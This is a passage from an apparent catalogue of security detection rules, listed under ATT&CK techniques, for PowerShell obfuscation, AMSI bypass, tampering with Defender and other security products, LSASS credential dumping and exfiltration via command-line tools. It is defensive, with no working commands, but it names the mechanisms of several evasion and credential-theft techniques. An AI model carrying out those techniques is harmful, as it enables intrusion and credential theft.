    Description: Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques
  • Suspicious XOR Encoded PowerShell Command - Level: medium
    Description: Detects presence of a potentially xor encoded powershell command
  • Suspicious Schtasks Execution AppData Folder - Level: high
    Description: Detects the creation of a schtask that executes a file from C:\Users\\AppData\Local
  • Potential Persistence Via Powershell Search Order Hijacking - Task - Level: high
    Description: Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell "Get-Variable" technique as seen being used in Colibri Loader
  • Scheduled Task Executing Payload from Registry - Level: medium
    Description: Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell.
  • Scheduled Task Executing Encoded Payload from Registry - Level: high
    Description: Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell.
  • Potential Data Exfiltration Activity Via CommandLine Tools - Level: high
    Description: Detects the use of various CLI utilities exfiltrating data via web requests
  • Hidden Powershell in Link File Pattern - Level: medium
    Description: Detects events that appear when a user click on a link file with a powershell command in it
  • Windows Shell/Scripting Processes Spawning Suspicious Programs - Level: high
    Description: Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.
  • Usage Of Web Request Commands And Cmdlets - Level: medium
    Description: Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine
  • Potentially Suspicious WebDAV LNK Execution - Level: medium
    Description: Detects possible execution via LNK file accessed on a WebDAV server.
  • Remote PowerShell Session Host Process (WinRM) - Level: medium
    Description: Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).
  • Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell - Level: medium
    Description: Detects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI.
  • Potentially Suspicious Command Executed Via Run Dialog Box - Registry - Level: high
    Description: Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key. This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.
  • Turla Group Commands May 2020 - Level: critical
    Description: Detects commands used by Turla group as reported by ESET in May 2020
  • TropicTrooper Campaign November 2018 - Level: high
    Description: Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia
  • Potential Baby Shark Malware Activity - Level: high
    Description: Detects activity that could be related to Baby Shark malware
  • Potential Emotet Activity - Level: high
    Description: Detects all Emotet like process executions that are not covered by the more generic rules
  • Operation Wocao Activity - Level: high
    Description: Detects activity mentioned in Operation Wocao report
  • Operation Wocao Activity - Security - Level: high
    Description: Detects activity mentioned in Operation Wocao report
  • Suspicious PrinterPorts Creation (CVE-2020-1048) - Level: high
    Description: Detects new commands that add new printer port which point to suspicious file
  • Exploited CVE-2020-10189 Zoho ManageEngine - Level: high
    Description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189
  • UNC2452 Process Creation Patterns - Level: high
    Description: Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries
  • Greenbug Espionage Group Indicators - Level: critical
    Description: Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec
  • UNC2452 PowerShell Pattern - Level: critical
    Description: Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports
  • Potential BlackByte Ransomware Activity - Level: high
    Description: Detects command line patterns used by BlackByte ransomware in different operations
  • CVE-2022-24527 Microsoft Connected Cache LPE - Level: high
    Description: Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache
  • Potential Bumblebee Remote Thread Creation - Level: high
    Description: Detects remote thread injection events based on action seen used by bumblebee
  • ChromeLoader Malware Execution - Level: high
    Description: Detects execution of ChromeLoader malware via a registered scheduled task
  • Raspberry Robin Subsequent Execution of Commands - Level: high
    Description: Detects raspberry robin subsequent execution of commands.
  • Raspberry Robin Initial Execution From External Drive - Level: high
    Description: Detects the initial execution of the Raspberry Robin malware from an external drive using "Cmd.EXE".
  • FakeUpdates/SocGholish Activity - Level: high
    Description: Detects initial execution of FakeUpdates/SocGholish malware via wscript that later executes commands via cmd or powershell.
  • MERCURY APT Activity - Level: high
    Description: Detects suspicious command line patterns seen being used by MERCURY APT
  • Rorschach Ransomware Execution Activity - Level: critical
    Description: Detects Rorschach ransomware execution activity
  • Potential APT FIN7 POWERHOLD Execution - Level: high
    Description: Detects execution of the POWERHOLD script seen used by FIN7 as reported by WithSecureLabs
  • Potential POWERTRASH Script Execution - Level: high
    Description: Detects potential execution of the PowerShell script POWERTRASH
  • Lace Tempest PowerShell Evidence Eraser - Level: high
    Description: Detects a PowerShell script used by Lace Tempest APT to erase evidence from victim servers by exploiting CVE-2023-47246 as reported by SysAid Team
  • Lace Tempest PowerShell Launcher - Level: high
    Description: Detects a PowerShell script used by Lace Tempest APT to launch their malware loader by exploiting CVE-2023-47246 as reported by SysAid Team
  • Potential APT FIN7 Exploitation Activity - Level: medium
    Description: Detects potential APT FIN7 exploitation activity as reported by Google. In order to obtain initial access, FIN7 used compromised Remote Desktop Protocol (RDP) credentials to login to a target server and initiate specific Windows process chains.
  • Remote Thread Creation Via PowerShell - Level: medium
    Description: Detects the creation of a remote thread from a Powershell process to another process
  • Network Connection Initiated By PowerShell Process - Level: low
    Description: Detects a network connection that was initiated from a PowerShell process. Often times malicious powershell scripts download additional payloads or communicate back to command and control channels via uncommon ports or IPs. Use this rule as a basis for hunting for anomalies.
  • Uncommon PowerShell Hosts - Level: medium
    Description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe
  • bXOR Operator Usage In PowerShell Command Line - PowerShell Classic - Level: low
    Description: Detects powershell execution with that make use of to the bxor (Bitwise XOR). Attackers might use as an alternative obfuscation method to Base64 encoded commands. Investigate the CommandLine and process tree to determine if the activity is malicious.
  • WinAPI Library Calls Via PowerShell Scripts - Level: medium
    Description: Detects calls to WinAPI libraries from PowerShell scripts. Attackers can often leverage these APIs to avoid detection based on typical PowerShell function calls. Use this rule as a basis to hunt for interesting scripts.
  • WinAPI Function Calls Via PowerShell Scripts - Level: medium
    Description: Detects calls to WinAPI functions from PowerShell scripts. Attackers can often leverage these APIs to avoid detection based on typical PowerShell function calls. Use this rule as a basis to hunt for interesting scripts.
  • Headless Process Launched Via Conhost.EXE - Level: medium
    Description: Detects the launch of a child process via "conhost.exe" with the "--headless" flag. The "--headless" flag hides the windows from the user upon execution.
  • Unusually Long PowerShell CommandLine - Level: low
    Description: Detects unusually long PowerShell command lines with a length of 1000 characters or more
  • Invocation Of Crypto-Classes From The "Cryptography" PowerShell Namespace - Level: medium
    Description: Detects the invocation of PowerShell commands with references to classes from the "System.Security.Cryptography" namespace. The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. These can be used for example in decrypting malicious payload for defense evasion.
  • Potentially Suspicious PowerShell Child Processes - Level: medium
    Description: Detects potentially suspicious child processes spawned by PowerShell. Use this rule to hunt for potential anomalies initiating from PowerShell scripts and commands.
  • Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace - Level: medium
    Description: Detects the setting of a registry inside the "\Shell\Open\Command" value with PowerShell classes from the "System.Security.Cryptography" namespace. The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. These can be used for example in decrypting malicious payload for defense evasion.
  • Invoke-Obfuscation CLIP+ Launcher - Level: high
    Description: Detects Obfuscated use of Clip.exe to execute PowerShell
  • Invoke-Obfuscation STDIN+ Launcher - Level: high
    Description: Detects Obfuscated use of stdin to execute PowerShell
  • Invoke-Obfuscation VAR+ Launcher - Level: high
    Description: Detects Obfuscated use of Environment Variables to execute PowerShell
  • Invoke-Obfuscation COMPRESS OBFUSCATION - Level: medium
    Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
  • Invoke-Obfuscation RUNDLL LAUNCHER - Level: medium
    Description: Detects Obfuscated Powershell via RUNDLL LAUNCHER
  • Invoke-Obfuscation Via Stdin - Level: high
    Description: Detects Obfuscated Powershell via Stdin in Scripts
  • Invoke-Obfuscation Via Use Clip - Level: high
    Description: Detects Obfuscated Powershell via use Clip.exe in Scripts
  • Invoke-Obfuscation Via Use MSHTA - Level: high
    Description: Detects Obfuscated Powershell via use MSHTA in Scripts
  • Invoke-Obfuscation Via Use Rundll32 - Level: high
    Description: Detects Obfuscated Powershell via use Rundll32 in Scripts
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Level: high
    Description: Detects Obfuscated Powershell via VAR++ LAUNCHER
attack.t1562.001 113
Show Rules (113)
  • PowerShell AMSI Bypass Pattern - Level: high
    Description: Detects attempts to disable AMSI in the command line. It is possible to bypass AMSI by disabling it before loading the main payload.
  • Stop Or Remove Antivirus Service - Level: high
    Description: Detects usage of 'Stop-Service' or 'Remove-Service' powershell cmdlet to disable AV services. Adversaries may disable security tools to avoid possible detection of their tools and activities by stopping antivirus service
  • Suspicious Execution of Sc to Delete AV Services - Level: high
    Description: Detects when attackers use "sc.exe" to delete AV services from the system in order to avoid detection
  • Disable Microsoft Office Security Features - Level: high
    Description: Disable Microsoft Office Security Features by registry
  • Windows Defender Threat Detection Disabled - Level: high
    Description: Detects disabling Windows Defender threat protection
  • AWS CloudTrail Important Change - Level: medium
    Description: Detects disabling, deleting and updating of a Trail
  • AWS Config Disabling Channel/Recorder - Level: high
    Description: Detects AWS Config Service disabling
  • AWS GuardDuty Important Change - Level: high
    Description: Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs.
  • Azure Kubernetes Events Deleted - Level: medium
    Description: Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection.
  • Bitbucket Global Secret Scanning Rule Deleted - Level: medium
    Description: Detects Bitbucket global secret scanning rule deletion activity.
  • Bitbucket Global SSH Settings Changed - Level: medium
    Description: Detects Bitbucket global SSH access configuration changes.
  • Bitbucket Audit Log Configuration Updated - Level: medium
    Description: Detects changes to the bitbucket audit log configuration.
  • Bitbucket Project Secret Scanning Allowlist Added - Level: low
    Description: Detects when a secret scanning allowlist rule is added for projects.
  • Bitbucket Secret Scanning Exempt Repository Added - Level: high
    Description: Detects when a repository is exempted from secret scanning feature.
  • Bitbucket Secret Scanning Rule Deleted - Level: low
    Description: Detects when secret scanning rule is deleted for the project or repository.
  • Github Push Protection Bypass Detected - Level: low
    Description: Detects when a user bypasses the push protection on a secret detected by secret scanning.
  • Github Push Protection Disabled - Level: high
    Description: Detects if the push protection feature is disabled for an organization, enterprise, repositories or custom pattern rules.
  • Github Secret Scanning Feature Disabled - Level: high
    Description: Detects if the secret scanning feature is disabled for an enterprise or repository.
  • ESXi Syslog Configuration Change Via ESXCLI - Level: medium
    Description: Detects changes to the ESXi syslog configuration via "esxcli"
  • Disable Security Tools - Level: medium
    Description: Detects disabling security tools
  • Cisco Disabling Logging - Level: high
    Description: Turn off logging locally or remote
  • Microsoft Malware Protection Engine Crash - Level: high
    Description: This rule detects a suspicious crash of the Microsoft Malware Protection Engine
  • Microsoft Malware Protection Engine Crash - WER - Level: high
    Description: This rule detects a suspicious crash of the Microsoft Malware Protection Engine
  • Weak Encryption Enabled and Kerberoast - Level: high
    Description: Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.
  • NetNTLM Downgrade Attack - Level: high
    Description: Detects NetNTLM downgrade attack
  • Potential Privileged System Service Operation - SeLoadDriverPrivilege - Level: medium
    Description: Detects the usage of the 'SeLoadDriverPrivilege' privilege. This privilege is required to load or unload a device driver. With this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode. This user right does not apply to Plug and Play device drivers. If you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers. This will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools. So you have to work with a whitelist to find the bad stuff.
  • Windows Defender Exclusion List Modified - Level: medium
    Description: Detects modifications to the Windows Defender exclusion registry key. This could indicate a potentially suspicious or even malicious activity by an attacker trying to add a new exclusion in order to bypass security.
  • Windows Defender Exclusion Deleted - Level: medium
    Description: Detects when a Windows Defender exclusion has been deleted. This could indicate an attacker trying to delete their tracks by removing the added exclusions
  • Windows Defender Exclusion Registry Key - Write Access Requested - Level: medium
    Description: Detects write access requests to the Windows Defender exclusions registry keys. This could be an indication of an attacker trying to request a handle or access the object to write new exclusions in order to bypass security.
  • Windows Defender Threat Detection Service Disabled - Level: medium
    Description: Detects when the "Windows Defender Threat Protection" service is disabled.
  • Windows Defender Grace Period Expired - Level: high
    Description: Detects the expiration of the grace period of Windows Defender. This means protection against viruses, spyware, and other potentially unwanted software is disabled.
  • Windows Defender Exclusions Added - Level: medium
    Description: Detects the Setting of Windows Defender Exclusions
  • Windows Defender Exploit Guard Tamper - Level: high
    Description: Detects when someone is adding or removing applications or folders from exploit guard "ProtectedFolders" or "AllowedApplications"
  • Windows Defender Submit Sample Feature Disabled - Level: low
    Description: Detects disabling of the "Automatic Sample Submission" feature of Windows Defender.
  • Windows Defender Malware And PUA Scanning Disabled - Level: high
    Description: Detects disabling of the Windows Defender feature of scanning for malware and other potentially unwanted software
  • Windows Defender Real-time Protection Disabled - Level: high
    Description: Detects disabling of Windows Defender Real-time Protection. As this event doesn't contain a lot of information on who initiated this action you might want to reduce it to a "medium" level if this occurs too many times in your environment
  • Windows Defender Real-Time Protection Failure/Restart - Level: medium
    Description: Detects issues with Windows Defender Real-Time Protection features
  • Win Defender Restored Quarantine File - Level: high
    Description: Detects the restoration of files from the defender quarantine
  • Windows Defender Configuration Changes - Level: high
    Description: Detects suspicious changes to the Windows Defender configuration
  • Microsoft Defender Tamper Protection Trigger - Level: high
    Description: Detects blocked attempts to change any of Defender's settings such as "Real Time Monitoring" and "Behavior Monitoring"
  • Windows Defender Virus Scanning Feature Disabled - Level: high
    Description: Detects disabling of the Windows Defender virus scanning feature
  • Suspicious PROCEXP152.sys File Created In TMP - Level: medium
    Description: Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder. This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.
  • Load Of RstrtMgr.DLL By A Suspicious Process - Level: high
    Description: Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shut downing specific processes.
  • Load Of RstrtMgr.DLL By An Uncommon Process - Level: low
    Description: Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shut downing specific processes.
  • Tamper Windows Defender - PSClassic - Level: high
    Description: Attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow.
  • AMSI Bypass Pattern Assembly GetType - Level: high
    Description: Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts
  • Potential AMSI Bypass Script Using NULL Bits - Level: medium
    Description: Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities
  • Disable-WindowsOptionalFeature Command PowerShell - Level: high
    Description: Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
  • Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging - Level: high
    Description: Detects attempts to remove Windows Defender configuration using the 'MpPreference' cmdlet
  • Tamper Windows Defender - ScriptBlockLogging - Level: high
    Description: Detects PowerShell scripts attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow.
  • HackTool - CobaltStrike BOF Injection Pattern - Level: high
    Description: Detects a typical pattern of a CobaltStrike BOF which inject into other processes
  • Dism Remove Online Package - Level: medium
    Description: Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
  • HackTool - PowerTool Execution - Level: high
    Description: Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files
  • HackTool - Stracciatella Execution - Level: high
    Description: Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.
  • Suspicious Windows Trace ETW Session Tamper Via Logman.EXE - Level: high
    Description: Detects the execution of "logman" utility in order to disable or delete Windows trace sessions
  • Windows Defender Definition Files Removed - Level: high
    Description: Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files
  • Potential AMSI Bypass Via .NET Reflection - Level: high
    Description: Detects Request to "amsiInitFailed" that can be used to disable AMSI Scanning
  • Potential AMSI Bypass Using NULL Bits - Level: medium
    Description: Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities
  • Powershell Base64 Encoded MpPreference Cmdlet - Level: high
    Description: Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV
  • Powershell Defender Disable Scan Feature - Level: high
    Description: Detects requests to disable Microsoft Defender features using PowerShell commands
  • Powershell Defender Exclusion - Level: medium
    Description: Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets
  • Disable Windows Defender AV Security Monitoring - Level: high
    Description: Detects attackers attempting to disable Windows Defender using Powershell
  • Disabled IE Security Features - Level: high
    Description: Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features
  • Obfuscated PowerShell OneLiner Execution - Level: high
    Description: Detects the execution of a specific OneLiner to download and execute powershell modules in memory.
  • Tamper Windows Defender Remove-MpPreference - Level: high
    Description: Detects attempts to remove Windows Defender configurations using the 'MpPreference' cmdlet
  • Service StartupType Change Via PowerShell Set-Service - Level: medium
    Description: Detects the use of the PowerShell "Set-Service" cmdlet to change the startup type of a service to "disabled" or "manual"
  • PUA - CleanWipe Execution - Level: high
    Description: Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.
  • Python Function Execution Security Warning Disabled In Excel - Level: high
    Description: Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed. Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.
  • Add SafeBoot Keys Via Reg Utility - Level: high
    Description: Detects execution of "reg.exe" commands with the "add" or "copy" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not
  • SafeBoot Registry Key Deleted Via Reg.EXE - Level: high
    Description: Detects execution of "reg.exe" commands with the "delete" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products
  • Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE - Level: medium
    Description: Detects the usage of "reg.exe" to add Defender folder exclusions. Qbot has been seen using this technique to add exclusions for folders within AppData and ProgramData.
  • Service Registry Key Deleted Via Reg.EXE - Level: high
    Description: Detects execution of "reg.exe" commands with the "delete" flag on services registry key. Often used by attacker to remove AV software services
  • Security Service Disabled Via Reg.EXE - Level: high
    Description: Detects execution of "reg.exe" to disable security services such as Windows Defender.
  • Reg Add Suspicious Paths - Level: high
    Description: Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys
  • Disabled Volume Snapshots - Level: high
    Description: Detects commands that temporarily turn off Volume Snapshots
  • Suspicious Windows Defender Registry Key Tampering Via Reg.EXE - Level: high
    Description: Detects the usage of "reg.exe" to tamper with different Windows Defender registry keys in order to disable some important features related to protection and detection
  • Service StartupType Change Via Sc.EXE - Level: medium
    Description: Detect the use of "sc.exe" to change the startup type of a service to "disabled" or "demand"
  • Raccine Uninstall - Level: high
    Description: Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.
  • Suspicious Windows Service Tampering - Level: high
    Description: Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause, disable or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts
  • Sysinternals PsSuspend Suspicious Execution - Level: high
    Description: Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses
  • Sysmon Configuration Update - Level: medium
    Description: Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely
  • Uninstall Sysinternals Sysmon - Level: high
    Description: Detects the removal of Sysmon, which could be a potential attempt at defense evasion
  • Taskkill Symantec Endpoint Protection - Level: high
    Description: Detects one of the possible scenarios for disabling Symantec Endpoint Protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.
  • Uninstall Crowdstrike Falcon Sensor - Level: high
    Description: Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon
  • Potential Tampering With Security Products Via WMIC - Level: high
    Description: Detects uninstallation or termination of security products using the WMIC utility
  • Folder Removed From Exploit Guard ProtectedFolders List - Registry - Level: high
    Description: Detects the removal of folders from the "ProtectedFolders" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder
  • Removal Of AMSI Provider Registry Keys - Level: high
    Description: Detects the deletion of AMSI provider registry key entries in HKLM\Software\Microsoft\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.
  • Disable Security Events Logging Adding Reg Key MiniNt - Level: high
    Description: Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.
  • NetNTLM Downgrade Attack - Registry - Level: high
    Description: Detects NetNTLM downgrade attack
  • Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback - Level: medium
    Description: Detects enabling of the "AllowAnonymousCallback" registry value, which allows a remote connection between computers that do not have a trust relationship.
  • Potential AMSI COM Server Hijacking - Level: high
    Description: Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless
  • Sysmon Driver Altitude Change - Level: high
    Description: Detects changes in Sysmon driver altitude value. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.
  • Windows Defender Exclusions Added - Registry - Level: medium
    Description: Detects the Setting of Windows Defender Exclusions
  • Antivirus Filter Driver Disallowed On Dev Drive - Registry - Level: high
    Description: Detects activity that indicates a user disabling the ability for Antivirus mini filter to inspect a "Dev Drive".
  • Hypervisor Enforced Code Integrity Disabled - Level: high
    Description: Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to be run in the kernel
  • Hypervisor Enforced Paging Translation Disabled - Level: high
    Description: Detects changes to the "DisableHypervisorEnforcedPagingTranslation" registry value. Where the it is set to "1" in order to disable the Hypervisor Enforced Paging Translation feature.
  • Disable Exploit Guard Network Protection on Windows Defender - Level: medium
    Description: Detects disabling Windows Defender Exploit Guard Network Protection
  • Disabled Windows Defender Eventlog - Level: high
    Description: Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections
  • Disable PUA Protection on Windows Defender - Level: high
    Description: Detects disabling Windows Defender PUA protection
  • Disable Tamper Protection on Windows Defender - Level: medium
    Description: Detects disabling Windows Defender Tamper Protection
  • Disable Privacy Settings Experience in Registry - Level: medium
    Description: Detects registry modifications that disable Privacy Settings Experience
  • Windows Defender Service Disabled - Registry - Level: high
    Description: Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry
  • Scripted Diagnostics Turn Off Check Enabled - Registry - Level: medium
    Description: Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability
  • Suspicious Application Allowed Through Exploit Guard - Level: high
    Description: Detects applications being added to the "allowed applications" list of exploit guard in order to bypass controlled folder settings
  • Uncommon Extension In Keyboard Layout IME File Registry Value - Level: high
    Description: Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
  • Suspicious Path In Keyboard Layout IME File Registry Value - Level: high
    Description: Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
  • Microsoft Office Protected View Disabled - Level: high
    Description: Detects changes to Microsoft Office protected view registry keys with which the attacker disables this feature.
  • Python Function Execution Security Warning Disabled In Excel - Registry - Level: high
    Description: Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed. Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.
  • Tamper With Sophos AV Registry Keys - Level: high
    Description: Detects tamper attempts to sophos av functionality via registry key modification
  • Suspicious Service Installed - Level: medium
    Description: Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders. Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)
  • Disable Windows Defender Functionalities Via Registry Keys - Level: high
    Description: Detects when attackers or tools disable Windows Defender functionalities via the Windows registry
  • Potential Ke3chang/TidePool Malware Activity - Level: high
    Description: Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020
  • AWS Macie Evasion - Level: medium
    Description: Detects evade to Macie detection.
attack.t1003.001 82
Show Rules (82)
  • Credential Dumping Tools Service Execution - Level: critical
    Description: Detects well-known credential dumping tools execution via service execution events
  • CrackMapExec File Creation Patterns - Level: high
    Description: Detects suspicious file creation patterns found in logs when CrackMapExec is used
  • LSASS Memory Dump File Creation - Level: high
    Description: LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified
  • CreateMiniDump Hacktool - Level: high
    Description: Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine
  • Credential Dumping by LaZagne - Level: critical
    Description: Detects LSASS process access by LaZagne for credential dumping.
  • Credential Dumping Tools Accessing LSASS Memory - Level: high
    Description: Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools
  • Credential Dumping by Pypykatz - Level: critical
    Description: Detects LSASS process access by pypykatz for credential dumping.
  • Process Memory Dumped Via RdrLeakDiag.EXE - Level: high
    Description: Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory
  • Accessing WinAPI in PowerShell for Credentials Dumping - Level: high
    Description: Detects Accessing to lsass.exe by Powershell
  • Antivirus Password Dumper Detection - Level: critical
    Description: Detects a highly relevant Antivirus alert that reports a password dumper. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
  • Transferring Files with Credential Data via Network Shares - Zeek - Level: medium
    Description: Transferring files with well-known filenames (sensitive files with credential data) using network shares
  • Mimikatz Use - Level: high
    Description: This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)
  • Potential Credential Dumping Via WER - Application - Level: high
    Description: Detects Windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential
  • LSASS Access From Non System Account - Level: medium
    Description: Detects potential mimikatz-like tools accessing LSASS from non system account
  • Credential Dumping Tools Service Execution - Security - Level: high
    Description: Detects well-known credential dumping tools execution via service execution events
  • Password Dumper Activity on LSASS - Level: high
    Description: Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN
  • Potentially Suspicious AccessMask Requested From LSASS - Level: medium
    Description: Detects process handle on LSASS process with certain access mask
  • Transferring Files with Credential Data via Network Shares - Level: medium
    Description: Transferring files with well-known filenames (sensitive files with credential data) using network shares
  • Credential Dumping Tools Service Execution - System - Level: high
    Description: Detects well-known credential dumping tools execution via service execution events
  • LSASS Access Detected via Attack Surface Reduction - Level: high
    Description: Detects Access to LSASS Process
  • Potential Credential Dumping Attempt Via PowerShell Remote Thread - Level: high
    Description: Detects remote thread creation by PowerShell processes into "lsass.exe"
  • Password Dumper Remote Thread in LSASS - Level: high
    Description: Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage. The process in field Process is the malicious program. A single execution can lead to hundreds of events.
  • Cred Dump Tools Dropped Files - Level: high
    Description: Files with well-known filenames (parts of credential dump software or files produced by them) creation
  • HackTool - CrackMapExec File Indicators - Level: high
    Description: Detects file creation events with filename patterns used by CrackMapExec.
  • HackTool - Dumpert Process Dumper Default File - Level: critical
    Description: Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory
  • HackTool - SafetyKatz Dump Indicator - Level: high
    Description: Detects default lsass dump filename generated by SafetyKatz.
  • LSASS Process Memory Dump Files - Level: high
    Description: Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.
  • LSASS Process Dump Artefact In CrashDumps Folder - Level: high
    Description: Detects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.
  • WerFault LSASS Process Memory Dump - Level: high
